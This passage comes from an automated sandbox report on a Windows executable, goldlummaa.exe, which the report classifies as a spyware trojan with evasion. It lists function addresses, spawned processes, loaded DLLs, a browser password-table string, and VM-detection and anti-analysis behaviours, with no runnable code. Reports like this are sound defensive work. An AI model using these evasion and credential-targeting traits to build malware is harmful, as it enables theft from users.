                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042B1C03_2_0042B1C0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041D9E03_2_0041D9E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004111E53_2_004111E5
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004059F03_2_004059F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004239F23_2_004239F2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043C1F03_2_0043C1F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043B9A13_2_0043B9A1
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004062503_2_00406250
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041D2703_2_0041D270
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00424A743_2_00424A74
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004092303_2_00409230
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00423A343_2_00423A34
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004192DA3_2_004192DA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D2F03_2_0043D2F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043C2803_2_0043C280
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004252BA3_2_004252BA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004043703_2_00404370
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041CB053_2_0041CB05
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00428BC03_2_00428BC0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004143C23_2_004143C2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00402BD03_2_00402BD0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00428BE93_2_00428BE9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004373993_2_00437399
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004393A03_2_004393A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00416BA53_2_00416BA5
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004293AA3_2_004293AA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00436C003_2_00436C00
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004234103_2_00423410
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00404CB03_2_00404CB0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004074B03_2_004074B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041DD503_2_0041DD50
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004185783_2_00418578
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042D57E3_2_0042D57E
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004245023_2_00424502
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00421D103_2_00421D10
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041D5E03_2_0041D5E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004175823_2_00417582
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D5803_2_0043D580
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00427DA23_2_00427DA2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004205B03_2_004205B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C64A3_2_0042C64A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00426E503_2_00426E50
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042B4F73_2_0042B4F7
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043462A3_2_0043462A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004356303_2_00435630
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004066E03_2_004066E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C6E43_2_0042C6E4
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00430EF03_2_00430EF0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004256F93_2_004256F9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00425E903_2_00425E90
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004156A03_2_004156A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041BEA03_2_0041BEA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00405EB03_2_00405EB0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00415F663_2_00415F66
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004197703_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004097003_2_00409700
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C7263_2_0042C726
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042C7353_2_0042C735
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041DF803_2_0041DF80
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00402FA03_2_00402FA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C610003_2_00C61000
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C652353_2_00C65235
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C715423_2_00C71542
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: String function: 00C6970F appears 36 times
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: String function: 00407F70 appears 46 times
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: String function: 00C651F0 appears 64 times
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: String function: 00414060 appears 74 times
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                    Source: goldlummaa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: goldlummaa.exeStatic PE information: Section: .bss ZLIB complexity 1.0003260869565218
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/9@1/2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004361E0
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7460
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\409fc4e0-0835-467c-b4d6-b1f0ab314623Jump to behavior
                    Source: goldlummaa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\goldlummaa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: goldlummaa.exe, 00000003.00000003.1433313990.0000000003278000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1433089677.0000000003294000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: goldlummaa.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile read: C:\Users\user\Desktop\goldlummaa.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess created: C:\Users\user\Desktop\goldlummaa.exe "C:\Users\user\Desktop\goldlummaa.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: goldlummaa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                    Source: goldlummaa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: goldlummaa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: goldlummaa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: goldlummaa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: goldlummaa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: goldlummaa.exeStatic PE information: section name: .OO
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C646A3 push ecx; ret 0_2_00C646B6
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00444520 push ebp; ret 3_2_00444522
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h3_2_0043BF01
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C646A3 push ecx; ret 3_2_00C646B6
                    Source: C:\Users\user\Desktop\goldlummaa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\goldlummaa.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exe TID: 7476Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BE9A FindFirstFileExW,0_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C6BF4B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BE9A FindFirstFileExW,3_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00C6BF4B
                    Source: Amcache.hve.7.drBinary or memory string: VMware
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                    Source: goldlummaa.exe, 00000003.00000003.1471495080.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702750734.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
